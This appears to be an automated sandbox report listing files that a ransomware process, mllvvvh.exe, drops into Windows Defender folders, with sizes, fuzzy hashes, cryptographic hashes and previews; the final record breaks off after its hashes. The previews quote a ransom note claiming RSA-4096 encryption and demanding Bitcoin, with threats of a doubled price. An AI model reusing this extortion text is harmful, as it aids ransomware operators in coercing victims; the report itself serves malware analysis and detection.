                  C:\ProgramData\Microsoft\Windows Defender\Features\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Features\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\LocalCopy\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\LocalCopy\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\LocalCopy\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Network Inspection System\Support\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
                  SHA-512:04B88B4747E742152CC6E75581A4D53777D3B05599F23867EBAE0F4163A2C9354F20A3D9104F277A49F9762BB34C5859127C676E8C98E7568D01EC36094042CB
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Network Inspection System\Support\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):338760
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bl:xrCifKrCifKrCifKrCifKrCifA
                  MD5:53A382FDC632097B36E90F7F51340A73
                  SHA1:524B5598A052A5D80CE2C55B88EC632BC37CE2EF
                  SHA-256:549C507EF017E234B89D0B901B59CF7B0F8F90C11220DF987E8C06BB6D8272D6
                  SHA-512:5FE80827BDE146B5ECE29654BB0638D350221575597781FE4C5677E56CE092D3E46BC7610EDE641F910D9F5D9A55585AE49FF77C9DC3B2445B00294069671973
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Network Inspection System\Support\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):10485
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5u
                  MD5:80CA2F04E38E47405C8711796F2872C0
                  SHA1:B93604437AA672E77266E80F252ECDF2E60CA273
                  SHA-256:44A0EE085B96A05215F63B5BCC610B294519E31113AD8E6709F79CE0B6C1DEDD
                  SHA-512:EB5FD717FACF5C526F32BC1F7294AB19A40CC8B4117D2BD1A46EBBD894A896934A6E2A03D421AEB03BA189D9F734A0FD999163881EBDE2E5343A5CD23A178DEB
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Network Inspection System\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Network Inspection System\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Network Inspection System\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Platform\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Platform\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Platform\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Quarantine\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Defender\Quarantine\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  Preview: .PNG........IHDR...~..........-9.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..r..E.fA.........H.&.T*..>D..)..#A@...-...........Hd%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+.......................J........x.d%.........?............Y....................GV..........#+........................o.....|.....)-R..._....M.].........R....}m........VCl_.?b................rk.....YZ.......>m}.....?..O..Uu...Gl..W..........%.#^.?bKlG...?!..............._8n.g.ZT..2......b..b..........[....... ..-..@d.7.....;..6..m........w..bku.......Z..Bl..{!.V...[..^...}/....bku..L...Z...s}Cn...*...*o._N......n^...}7...w.W..;u...........N.w.j.}..y5..S.......`......m).....gd...BX.....y...k..b.....M...&..Cl...!.I....$.~.m..?.6..b....L...B.....v.m..k_/..B...
                  C:\ProgramData\Microsoft\Windows Defender\Quarantine\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Defender\Scans\History\CacheManager\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):39280
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:664D8ACC6D2F9F4B76F9F81C97E6A091
                  SHA1:B88D3486CBFAB331F09CF03AB0E309D7B9796878
                  SHA-256:51F0C6EFD031D946D795C189CD0F0E5F9F459358E8D87F8E94B78F49F1B0F78D
